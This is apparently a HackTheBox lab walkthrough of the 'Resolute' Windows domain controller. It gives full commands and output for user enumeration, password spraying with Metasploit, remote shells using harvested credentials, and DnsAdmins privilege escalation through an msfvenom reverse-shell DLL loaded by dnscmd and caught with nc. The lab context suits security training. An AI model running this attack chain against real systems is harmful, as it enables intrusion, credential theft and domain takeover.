Welcome to another one of my technical HackTheBox walkthroughs, this time we are hacking the Resolute box. Lets jump in!

As always I start by launching the useful nmap command for a first look at the possible attack vectors.

db_nmap --min-hostgroup 96 -p 1-65535 -n -T4 -A -v 10.10.10.169

It seems to be a Windows machine (sure, HTB anticipate too, on the machine labs available, the OS on the server). We can enumerate information about that with enum4linux command-line tool (I have left out un-useful information).

root@kali:~/Desktop/hackthebox/_Resolute - 10.10.10.169/attack# enum4linux -U 10.10.10.169
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Jan 25 12:22:29 2020
 ==========================
|    Target Information    |

Target ........... 10.10.10.169
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

[...]
 ===========================================
|    Getting domain SID for 10.10.10.169    |
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: MEGABANK
Domain Sid: S-1-5-21-1392959593-3013219662-3596683436
[+] Host is part of a domain (not a workgroup)

 =============================
|    Users on 10.10.10.169    |
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail	Name: (null)	Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator	Name: (null)	Desc: Built-in account for administering the computer/domain
[...]
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko	Name: Marko Novak	Desc: Account created. Password set to Welcome123!
[...]


Woohoo, lots of users! Can you see a piece of interesting information? For the Marko Novak's user... description says "Account created. Password set to Welcome123!" It could be so beautiful if it will work but I don't hold my breath, so let's go try.

1667  smbclient -U marko 10.10.10.169
1668  smbclient -U marko -L 10.10.10.169
1669  smbclient -U marko -W MEGABANK -L 10.10.10.169
1670  rpcclient -U marko 10.10.10.169
1672  rpcclient -U MEGABANK\marko 10.10.10.169
1673  rpcclient -U marko 10.10.10.169
1674  smbclient -U marko -W MEGABANK -L 10.10.10.169
1675  rpcclient -U marko 10.10.10.169
1676  rpcclient -U marko RESOLUTE
1678  smbclient -U marko -W MEGABANK -L 10.10.10.169
1679  smbclient -U marko -L 10.10.10.169
1680  rpcclient -U marko RESOLUTE
1681  rpcclient -U MEGABANK\marko 10.10.10.169
1682  rpcclient -U marko resolute

As I expected, it don't works, but a system administrator like this (that specify the password in the user's description) could be common to use the same password for all users. Try to brute-forcing the other users with the same password. I search for an attack on metasploit and found something; for this exploit, you have to prepare a user list with the users listed before in the enum4linux command result.

root@kali:~/Desktop/hackthebox/_Resolute - 10.10.10.169# msfconsole -q
msf5 > search smb_login

Matching Modules
Name                             Disclosure Date  Rank    Check  Description
0  auxiliary/scanner/smb/smb_login                   normal  No     SMB Login Check Scanner

msf5 > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > set rhosts 10.10.10.169
rhosts => 10.10.10.169
msf5 auxiliary(scanner/smb/smb_login) > set user_file ./attack/user-list.txt
user_file => ./attack/user-list.txt
msf5 auxiliary(scanner/smb/smb_login) > set SMBPass Welcome123!
SMBPass => Welcome123!
msf5 auxiliary(scanner/smb/smb_login) > set stop_on_success false
stop_on_success => false
msf5 auxiliary(scanner/smb/smb_login) > exploit

[] 10.10.10.169:445      - 10.10.10.169:445 - Starting SMB login bruteforce
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: '.\Administrator:Welcome123!',
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: '.\Guest:Welcome123!',
[...]
[+] 10.10.10.169:445      - 10.10.10.169:445 - Success: '.\melanie:Welcome123!'
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: '.\zach:Welcome123!',
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: '.\simon:Welcome123!',
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: '.\naoki:Welcome123!',
[] 10.10.10.169:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


As he wanted to prove.

root@kali:~# rpcclient -U melanie 10.10.10.169
Enter WORKGROUP\melanie's password:
rpcclient $> exit


And it works! Now we need a reverse shell for windows, the most known shell platform for windows attack is Evil-WinRM, you can find it on GitHub at the link below:

https://github.com/Hackplayers/evil-winrm

There are different ways to use it, I prefer the comfort of the docker container; no installation, no download, no build... you need only to launch the command and it's all ready.

root@kali:~/Desktop/hackthebox/_Resolute - 10.10.10.169/attack# docker run --rm -ti --name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.169 -u MEGABANK\melanie -p 'Welcome123!' -s '/ps1_scripts/' -e '/exe_files/'

Evil-WinRM shell v2.1

Info: Establishing connection to remote endpoint


Good, you have a reverse shell on the machine with melanie's user, let's start to look around.

Evil-WinRM PS C:\Users\melanie\Documents> dir
Evil-WinRM PS C:\Users\melanie\Documents> cd ..
Evil-WinRM PS C:\Users\melanie> dir

Directory: C:\Users\melanie

Mode                LastWriteTime         Length Name

d-r---        12/4/2019   2:47 AM                Desktop
d-r---        12/4/2019   2:46 AM                Documents
d-r---        7/16/2016   6:18 AM                Downloads
d-r---        7/16/2016   6:18 AM                Favorites
d-r---        7/16/2016   6:18 AM                Links
d-r---        7/16/2016   6:18 AM                Music
d-r---        7/16/2016   6:18 AM                Pictures
d-----        7/16/2016   6:18 AM                Saved Games
d-r---        7/16/2016   6:18 AM                Videos

Evil-WinRM PS C:\Users\melanie> cd Desktop
Evil-WinRM PS C:\Users\melanie\Desktop> dir

Directory: C:\Users\melanie\Desktop

Mode                LastWriteTime         Length Name

-ar---        12/3/2019   7:33 AM             32 user.txt

Evil-WinRM PS C:\Users\melanie\Desktop> more user.txt
0******************************0

And the first flag is captured. I continue to search, but I can't read on the administrator folder and in the other profile's directory. I avoid listing all the commands that I launch to try to hack the machine but take into account that for each user I found (during the investigation session), I repeat for all of them the same sequence of activities.

For example, for melanie, I launch the "whoami /all" to understand the groups and the permission that the specific user has and can perform. Based on the groups, I search for a specific exploit for that and try all I found. If nothing succeeds I find another user that can connect to the machine with a similar or the same reverse shell and I start again to the whoami command. I try all the exploits tested for the previous user and continue with new and additional information.

But, in order to not to be too verbose, I write only the steps that at the end bring me to the success of the hacking activity, so if you take 20 minutes to read this tutorial, don't think that it took me 20 minutes to bypass the security systems of this machine .... it took me days!

Considering that all the exploits I found don't work, probably some other (funny) clue is spread on the pc. But, remember that the clue, often, is "hidden"...

Evil-WinRM PS C:> dir -ah

Directory: C:\

Mode                LastWriteTime         Length Name

d--hs-        12/3/2019   6:40 AM                $RECYCLE.BIN
d--hsl        9/25/2019  10:17 AM                Documents and Settings
d--h--        9/25/2019  10:48 AM                ProgramData
d--h--        12/3/2019   6:32 AM                PSTranscripts
d--hs-        9/25/2019  10:17 AM                Recovery
d--hs-        9/25/2019   6:25 AM                System Volume Information
-arhs-       11/20/2016   5:59 PM         389408 bootmgr
-a-hs-        7/16/2016   6:10 AM              1 BOOTNXT
-a-hs-        1/31/2020   1:09 PM      402653184 pagefile.sys


Ok, I went deeper in each folder before to find...

Evil-WinRM PS C:> cd  PSTranscripts
Evil-WinRM PS C:\PSTranscripts> dir -ah

Directory: C:\PSTranscripts

Mode                LastWriteTime         Length Name

d--h--        12/3/2019   6:45 AM                20191203

Evil-WinRM PS C:\PSTranscripts> cd 20191203
Evil-WinRM PS C:\PSTranscripts\20191203> dir
Evil-WinRM PS C:\PSTranscripts\20191203> dir -ah

Directory: C:\PSTranscripts\20191203

Mode                LastWriteTime         Length Name

-arh--        12/3/2019   6:45 AM           3732 
PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt


Something interesting. Pay careful attention to this file and search inside for some interesting information.

Evil-WinRM PS C:\PSTranscripts\20191203> type 
PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt

Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
[...]

ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
[...]

ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \fs01\backups ryan Serv3r4Admin4cc123!
[...]
PS>CommandInvocation(Out-String): "Out-String"

ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1

* cmd /c net use X: \fs01\backups ryan Serv3r4Admin4cc123!

[...]

* cmd /c net use X: \fs01\backups ryan Serv3r4Admin4cc123!

CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException

[...]
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1

Nice... why don't we try?

root@kali:~/Desktop/hackthebox/_Resolute - 10.10.10.169/attack# docker run --rm -ti --name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.169 -u MEGABANK\ryan -p 'Serv3r4Admin4cc123!' -s '/ps1_scripts/' -e '/exe_files/'

Good, as said before, start again all the exploits tried for the melanie user and give a look around, again (obviously, you can try to list the Administrator folder, but you haven't permission for that).

Evil-WinRM PS C:\Users\ryan> dir Desktop

Directory: C:\Users\ryan\Desktop

Mode                LastWriteTime         Length Name

-ar---        12/3/2019   7:34 AM            155 note.txt

Evil-WinRM PS C:\Users\ryan> cd Desktop
dEvil-WinRM PS C:\Users\ryan\Desktop> dir

Directory: C:\Users\ryan\Desktop

Mode                LastWriteTime         Length Name

-ar---        12/3/2019   7:34 AM            155 note.txt

Evil-WinRM PS C:\Users\ryan\Desktop> dir -ah
Evil-WinRM PS C:\Users\ryan\Desktop> type note.txt
Email to team:

* due to change freeze, any system changes (apart from those to the administrator account) will be automatically reverted within 1 minute


Could it be useful for us? I don't know, but take in mind this file (no, it will not useful even in the future, you can forget them).

Evil-WinRM PS C:\Users\ryan\Desktop> whoami /all

USER INFORMATION

User Name     SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105

GROUP INFORMATION

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

PRIVILEGES INFORMATION

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

USER CLAIMS INFORMATION

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.


There's something different from the previous user, I'm a DnsAdmin now. Looking for an exploit about that (search on google for: privileges escalation through the dns windows) online I found this article.

http://www.abhizer.com/windows-privilege-escalation-dnsadmin-to-domaincontroller/

Nice, if it works, so let's go to try.

First of all, you have to create a dll to use as a sort of plug-in on the dns server. Use the msfvenom tool, create a library, executable and so on with trojan, malware and everything else inside. In this specific scenario, we put inside a specific reverse shell, that executed by the Dns Server, should provide us with administrator privileges.

We will go to specify the payload that will be "windows/x64/shell_reverse_tcp", our address IP that will be used by the dns to make a call at that specific address (in this case, my specific IP address at this moment is 10.10.14.233), the port where your pc will listen for the connection (I like to use always port 4444 in all my tutorials until now), the target platform (windows) and finally the output type of the file you want to generate, then send it all to a file as streaming output and the games are done.

root@kali:~/Desktop/hackthebox/_Resolute - 10.10.10.169/attack# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.233 LPORT=4444 --platform=windows -f dll > plugin.dll
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 5120 bytes


Now, you have to make available the windows machine you want to attack.

root@kali:~/Desktop/hackthebox/_Resolute - 10.10.10.169/attack# /usr/share/doc/python3-impacket/examples/./smbserver.py SHARE ./Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[] Config file parsed
[] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[] Config file parsed
[] Config file parsed
[] Config file parsed


Done! attach the plug-in to the dns script execution of the server and restart the service, so it activates the reverse shell and we can connect to it. Before you do that, launch a listener on the port you specify on your machine.

root@kali:~/Desktop/hackthebox/_Resolute - 10.10.10.169/attack# nc -nvlp 4444
listening on [any] 4444 ...


And now, on the remote machine.

Evil-WinRM PS C:\Users\ryan\Desktop> dnscmd.exe 10.10.10.169 /config /serverlevelplugindll \10.10.14.233\share\plugin.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

Evil-WinRM PS C:\Users\ryan\Desktop> sc.exe stop dns

SERVICE_NAME: dns
TYPE               : 10  WIN32_OWN_PROCESS
STATE              : 3  STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE    : 0  (0x0)
SERVICE_EXIT_CODE  : 0  (0x0)
CHECKPOINT         : 0x0
WAIT_HINT          : 0x0
sEvil-WinRM PS C:\Users\ryan\Desktop> sc.exe start dns

SERVICE_NAME: dns
TYPE               : 10  WIN32_OWN_PROCESS
STATE              : 2  START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE    : 0  (0x0)
SERVICE_EXIT_CODE  : 0  (0x0)
CHECKPOINT         : 0x0
WAIT_HINT          : 0x7d0
PID                : 3604
FLAGS              :


I think that we are near the second flag, guys!

connect to [10.10.14.233] from (UNKNOWN) [10.10.10.169] 49319
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd \Users
cd \Users

C:\Users>cd Administrator
cd Administrator

C:\Users\Administrator>dir
dir
Volume in drive C has no label.
Volume Serial Number is 923F-3611

Directory of C:\Users\Administrator

09/25/2019  09:43 AM              .
09/25/2019  09:43 AM              ..
12/04/2019  05:18 AM              Contacts
12/04/2019  05:18 AM              Desktop
12/04/2019  05:18 AM              Documents
12/04/2019  05:18 AM              Downloads
12/04/2019  05:18 AM              Favorites
12/04/2019  05:18 AM              Links
12/04/2019  05:18 AM              Music
12/04/2019  05:18 AM              Pictures
12/04/2019  05:18 AM              Saved Games
12/04/2019  05:18 AM              Searches
12/04/2019  05:18 AM              Videos
0 File(s)              0 bytes
13 Dir(s)  30,982,950,912 bytes free

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 923F-3611

Directory of C:\Users\Administrator\Desktop

12/04/2019  05:18 AM              .
12/04/2019  05:18 AM              ..
12/03/2019  07:32 AM                32 root.txt
1 File(s)             32 bytes
2 Dir(s)  30,982,950,912 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
e******************************c

And that's all folks, I hope this walkthrough was useful to you!

The awesome image used in this article is called El Imagativo and it was created by Brett Ferrin.